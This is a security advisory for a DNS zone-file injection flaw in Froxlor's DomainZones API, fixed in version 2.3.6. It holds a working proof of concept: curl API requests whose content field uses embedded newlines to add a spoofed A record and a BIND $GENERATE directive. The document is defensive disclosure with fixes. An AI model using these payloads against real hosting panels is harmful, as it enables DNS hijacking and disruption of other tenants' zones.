DomainZones::add() accepts arbitrary DNS record types without a whitelist and does not sanitize newline characters in the content field. When a DNS type not covered by the if/elseif validation chain is submitted (e.g., NAPTR, PTR, HINFO), content validation is entirely bypassed. Embedded newline characters in the content survive trim() processing, are stored in the database, and are written directly into BIND zone files via DnsEntry::__toString(). An authenticated customer can inject arbitrary DNS records and BIND directives ($INCLUDE, $ORIGIN, $GENERATE) into their domain's zone file.
Missing type whitelist — DomainZones.php:93:
The type parameter is accepted directly from user input with no validation against allowed values:
// lib/Froxlor/Api/Commands/DomainZones.php:93
$type = $this->getParam('type', true, 'A');
The if/elseif chain at lines 170-317 validates content only for 13 known types: A, AAAA, CAA, CNAME, DNAME, LOC, MX, NS, RP, SRV, SSHFP, TLSA, TXT. Any type not in this list falls through with no content validation at all. There is a TODO comment at line 148 acknowledging missing validation:
// TODO regex validate content for invalid characters
Missing newline sanitization — DomainZones.php:154:
The content field only receives trim(), which strips leading/trailing whitespace but preserves embedded newline characters:
// lib/Froxlor/Api/Commands/DomainZones.php:154
$content = trim($content);
Unsafe zone file output — DnsEntry.php:83:
DnsEntry::__toString() concatenates content directly into zone file format without escaping:
// lib/Froxlor/Dns/DnsEntry.php:83
return $this->record . "\t" . $this->ttl . "\t" . $this->class . "\t" . $this->type . "\t"
. (($this->priority >= 0 && ($this->type == 'MX' || $this->type == 'SRV')) ? $this->priority . "\t" : "")
. $_content . PHP_EOL;
Newlines in $_content produce new lines in the zone file, each parsed by BIND as an independent resource record or directive.
Zone file write — Bind.php:121:
// lib/Froxlor/Cron/Dns/Bind.php:121
fwrite($zonefile_handler, $zoneContent . $subzones);
The AntiXSS filter applied at the API layer (Api.php:91) targets HTML/JS XSS vectors and does not strip newline characters. The web UI form restricts types via a dropdown (formfield.dns_add.php:42-56), but this is client-side only — the server-side DomainZones::add() has no corresponding whitelist.
Execution flow:
type=NAPTR and content containing \n-separated linesgetParam() returns raw values without sanitizationNAPTR matches none of the if/elseif conditions — no content validation runstrim($content) preserves embedded newlinesdomain_dns table via prepared statementDnsEntry objects from DB records (Dns.php:297)DnsEntry::__toString() outputs content with embedded newlines into zone formatBind.php:121 writes zone to disk; BIND loads the file and processes injected lines as recordsStep 1: Inject a DNS record with embedded newlines via API
curl -s -X POST 'https://froxlor.example.com/api.php' \
-u 'APIKEY:APISECRET' \
-H 'Content-Type: application/json' \
-d '{
"command": "DomainZones.add",
"params": {
"id": 1,
"type": "NAPTR",
"content": "100 10 \"\" \"\" \"\" .\n@ 300 IN A 1.2.3.4\n@ 300 IN NAPTR 100 10 \"\" \"\" \"\" ."
}
}'
Expected: HTTP 200 with success response. The record is stored in the database.
Step 2: Wait for DNS cron to rebuild zones (or trigger manually)
# As admin, trigger the DNS rebuild cron
php /var/www/froxlor/scripts/froxlor_master_cronjob.php --force --dns
Step 3: Inspect the generated zone file
cat /etc/bind/domains/example.com.zone
Expected zone file content includes injected lines:
@ 18000 IN NAPTR 100 10 "" "" "" .
@ 300 IN A 1.2.3.4
@ 300 IN NAPTR 100 10 "" "" "" .
The line @ 300 IN A 1.2.3.4 is parsed by BIND as an independent A record pointing the domain to the attacker's IP.
Step 4: Verify BIND directive injection
curl -s -X POST 'https://froxlor.example.com/api.php' \
-u 'APIKEY:APISECRET' \
-H 'Content-Type: application/json' \
-d '{
"command": "DomainZones.add",
"params": {
"id": 1,
"type": "NAPTR",
"content": "100 10 \"\" \"\" \"\" .\n$GENERATE 1-255 $.0.168.192.in-addr.arpa. PTR host-$.example.com."
}
}'
This injects a $GENERATE directive that creates 255 PTR records.
An authenticated customer with DNS editing enabled can:
$INCLUDE, $ORIGIN, $GENERATE) that escape the DNS record context and can attempt to include local server files, alter zone origin, or mass-generate records.While this requires an authenticated customer account, DNS editing is a standard feature in shared hosting environments. In a multi-tenant deployment, a malicious customer can abuse this to disrupt the DNS server or inject records that bypass validation controls designed to protect zone integrity.
1. Add a type whitelist in DomainZones::add() (primary fix):
// lib/Froxlor/Api/Commands/DomainZones.php — after line 93
$type = $this->getParam('type', true, 'A');
$allowed_types = ['A', 'AAAA', 'CAA', 'CNAME', 'DNAME', 'LOC', 'MX', 'NS', 'RP', 'SRV', 'SSHFP', 'TLSA', 'TXT'];
if (!in_array($type, $allowed_types)) {
throw new Exception("DNS record type '" . htmlspecialchars($type) . "' is not supported", 406);
}
2. Strip newline characters from content (defense-in-depth):
// lib/Froxlor/Api/Commands/DomainZones.php — replace line 154
$content = trim(str_replace(["\r", "\n"], '', $content));
3. Sanitize in DnsEntry::__toString() as a belt-and-suspenders measure:
// lib/Froxlor/Dns/DnsEntry.php — at the start of __toString()
$_content = str_replace(["\r", "\n"], '', $this->content);
| Software | From | Fixed in |
|---|---|---|
froxlor / froxlor
|
- | 2.3.6 |
A security vulnerability is a weakness in software, hardware, or configuration that can be exploited to compromise confidentiality, integrity, or availability. Many vulnerabilities are tracked as CVEs (Common Vulnerabilities and Exposures), which provide a standardized identifier so teams can coordinate patching, mitigation, and risk assessment across tools and vendors.
CVSS (Common Vulnerability Scoring System) estimates technical severity, but it doesn't automatically equal business risk. Prioritize using context like internet exposure, affected asset criticality, known exploitation (proof-of-concept or in-the-wild), and whether compensating controls exist. A "Medium" CVSS on an exposed, production system can be more urgent than a "Critical" on an isolated, non-production host.
A vulnerability is the underlying weakness. An exploit is the method or code used to take advantage of it. A zero-day is a vulnerability that is unknown to the vendor or has no publicly available fix when attackers begin using it. In practice, risk increases sharply when exploitation becomes reliable or widespread.
Recurring findings usually come from incomplete Asset Discovery, inconsistent patch management, inherited images, and configuration drift. In modern environments, you also need to watch the software supply chain: dependencies, containers, build pipelines, and third-party services can reintroduce the same weakness even after you patch a single host. Unknown or unmanaged assets (often called Shadow IT) are a common reason the same issues resurface.
Use a simple, repeatable triage model: focus first on externally exposed assets, high-value systems (identity, VPN, email, production), vulnerabilities with known exploits, and issues that enable remote code execution or privilege escalation. Then enforce patch SLAs and track progress using consistent metrics so remediation is steady, not reactive.
SynScan combines attack surface monitoring and continuous security auditing to keep your inventory current, flag high-impact vulnerabilities early, and help you turn raw findings into a practical remediation plan.